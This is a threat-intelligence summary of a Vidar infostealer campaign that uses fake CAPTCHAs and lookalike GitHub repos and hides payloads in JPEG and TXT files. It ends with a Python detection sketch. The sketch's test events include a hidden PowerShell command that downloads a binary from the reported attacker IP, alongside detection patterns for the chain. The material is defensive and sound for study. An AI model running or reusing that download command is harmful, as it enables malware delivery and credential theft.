
Vidar Infostealer Spreads via Fake CAPTCHAs, Hides in JPEG and TXT Files
Why It Matters
The technique evades traditional file‑based detection, raising the threat level for enterprises and developers who may trust benign‑looking assets. It underscores the growing focus on social engineering and fileless malware in cyber‑espionage.
Key Takeaways
- Vidar embeds payloads in JPEG and TXT files via steganography
- Attack chain starts with fake CAPTCHAs and malicious GitHub repos
- Uses Windows LotL binaries and in‑memory .NET reflective loading
- Steals credentials, browser extensions, and crypto wallets via Telegram
Pulse Analysis
Since its first appearance in 2020, the Vidar infostealer has been a staple of credential‑theft operations, primarily targeting passwords stored in browsers. The latest 2026 variant, disclosed by Point Wild’s Lat61 threat‑intelligence team, marks a strategic shift from a straightforward password grabber to a modular, file‑less attack framework. By embedding malicious code inside everyday assets such as JPEG images and plain‑text files, the actors exploit the trust users place in familiar file types. This evolution mirrors a broader industry trend where adversaries prioritize social engineering and covert delivery mechanisms over traditional software vulnerabilities.
The campaign begins with deceptive vectors: fake CAPTCHA pages on compromised WordPress sites, counterfeit GitHub repositories labeled as “Claude Code,” and Discord or Reddit posts promising game cheats. When a victim runs the supplied command, a VBScript launches PowerShell, which fetches a Go‑compiled loader from an IP address (62.60.226.200). The loader reads Base64 strings hidden inside the downloaded JPEG or TXT files, reconstructs the final Vidar payload, and executes it via .NET reflective loading. Throughout, the malware relies on Living‑off‑the‑Land binaries like WScript, PowerShell, and RegAsm.exe to blend with legitimate processes.
From a defensive standpoint, the file‑less nature of this attack defeats many endpoint scanners that rely on static file signatures. Network monitoring must therefore focus on anomalous outbound connections to obscure IP ranges and the unusual use of legitimate Windows binaries for payload delivery. Organizations should enforce strict download policies, educate developers about the risks of unofficial repositories, and deploy behavioral analytics capable of spotting in‑memory execution patterns. As Vidar continues to refine its covert channels, the line between benign content and malicious code will blur, demanding a more proactive, threat‑intel‑driven security posture.
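As an added illustration (not code from the article or from Point Wild's Lat61 team), the following Python sketch implements two of the checks the analysis above calls for: flagging the script-host to PowerShell to RegAsm.exe process chain when the PowerShell command line downloads from a bare IP address, and scanning a JPEG or TXT file for a long Base64 run that decodes to a PE ("MZ") header. The Sysmon-style event records, the file paths and the sample JPEG are constructed for the example; the only value taken from the article is the loader IP address.

```python
import base64
import re

# Constructed Sysmon-style process-creation events. Host paths and file names are
# made up; the IP address is the loader host reported in the article.
EVENTS = [
    {"parent": "explorer.exe", "image": "wscript.exe",
     "cmd": r"wscript.exe C:\Users\u\AppData\Local\Temp\captcha.vbs"},
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmd": r"powershell.exe -w hidden -c iwr http://62.60.226.200/l.bin -OutFile $env:TEMP\l.bin"},
    {"parent": "powershell.exe", "image": "regasm.exe",
     "cmd": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": r"powershell.exe -File C:\scripts\backup.ps1"},  # benign admin use, must not fire
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b", re.I)

def suspicious_events(events):
    """Return (index, reason) for events matching the chain: a script host spawning PowerShell
    that downloads from a bare IP, or PowerShell spawning RegAsm.exe (the .NET loader host)."""
    hits = []
    for i, e in enumerate(events):
        image, parent, cmd = e["image"].lower(), e["parent"].lower(), e["cmd"]
        if image == "powershell.exe" and parent in SCRIPT_HOSTS and BARE_IP_URL.search(cmd):
            hits.append((i, "script host -> PowerShell download from bare IP"))
        elif image == "regasm.exe" and parent == "powershell.exe":
            hits.append((i, "PowerShell -> RegAsm.exe"))
    return hits

# Long runs of Base64-alphabet bytes; the loader reads such strings out of the JPEG/TXT files.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")

def embedded_pe_offsets(blob):
    """Offsets of Base64 runs inside an opaque file that decode to a PE ('MZ') header."""
    found = []
    for m in B64_RUN.finditer(blob):
        try:
            if base64.b64decode(m.group(), validate=True).startswith(b"MZ"):
                found.append(m.start())
        except ValueError:  # binascii.Error: the run was not valid Base64 after all
            pass
    return found

# Constructed sample: a minimal JPEG header, some padding, then a Base64-encoded fake PE stub.
FAKE_PE = b"MZ\x90\x00" + bytes(range(96))
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + base64.b64encode(FAKE_PE) + b"\xff\xd9"
```

Run `suspicious_events(EVENTS)` and `embedded_pe_offsets(SAMPLE_JPEG)` to see the two flagged events and the offset of the hidden blob; on real data, feed the functions your process-creation telemetry and the downloaded image/text files.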